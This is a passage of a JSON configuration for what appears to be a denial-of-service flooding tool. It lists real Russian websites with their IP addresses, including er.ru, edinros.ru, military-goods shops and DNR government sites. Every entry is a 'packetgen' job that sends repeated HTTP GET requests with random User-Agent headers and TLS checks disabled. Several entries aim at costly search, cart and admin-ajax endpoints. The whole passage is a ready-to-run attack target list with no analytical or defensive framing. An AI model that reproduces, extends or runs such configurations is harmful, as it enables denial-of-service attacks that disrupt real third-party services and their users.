              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.tilovik.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "185.253.32.132:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://www.tilovik.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "gear-craft.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "217.107.34.42:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://gear-craft.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "poligon59.com",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "31.31.198.124:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://poligon59.com/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "voensnab.msk.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "195.24.68.16:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://voensnab.msk.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.voentorg-2.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "37.140.192.89:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://www.voentorg-2.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "er.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "178.248.232.136:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://er.ru",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "er.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "178.248.232.136:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://er.ru/media/documents/August2021/L4Sk4t74UXKF1MG1oFjh.pdf",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "er.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "178.248.232.136:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://er.ru/search?q=1",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "er.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "178.248.232.136:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://er.ru/search-titles?dataType=json&q=hjggfcfgg",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "er.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "178.248.232.136:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://er.ru/search?q=1&page=-1",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "er.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "178.248.232.136:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://er.ru/search?q=1&page=99",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "er.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "178.248.232.136:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://er.ru/multimedia?page=1&j=h",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "er.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "178.248.232.136:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://er.ru/multimedia/video?page=266",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "er.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "178.248.232.136:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://er.ru/activity/comments?date_start=1900-07-01&date_end=2022-07-28&moskva=1",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "er.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "178.248.232.136:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://er.ru/activity/news?type=regional&date_start=2011-07-01&date_end=2022-07-22&piter=1",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "er.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "178.248.232.136:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://er.ru/feed/top_news/?sec=1",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "edinros.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "193.104.59.221:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://edinros.ru",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "edinros.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "193.104.59.221:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://edinros.ru",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.army-magazin.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "87.236.16.241:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://www.army-magazin.ru/phpshop/ajax/cartload.php",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "barrakuda.biz",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "45.130.41.30:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://barrakuda.biz/searchvm",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "radiocopter.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "45.130.41.34:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://radiocopter.ru/wp-admin/admin-ajax.php",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "rc-today.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "87.236.19.92:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://rc-today.ru/phpshop/ajax/add_to_cart.php",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "rcz-dnr.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "31.133.49.144:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://rcz-dnr.ru/postoyannaya-rabota.html",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "rcz-dnr.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "31.133.49.144:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://rcz-dnr.ru/postoyannaya-rabota.html",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "rcz-dnr.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "31.133.49.144:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://rcz-dnr.ru",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "rcz-dnr.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "31.133.49.144:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://rcz-dnr.ru",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "gosstat-dnr.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "185.114.137.26:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://gosstat-dnr.ru",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    }
  ]
}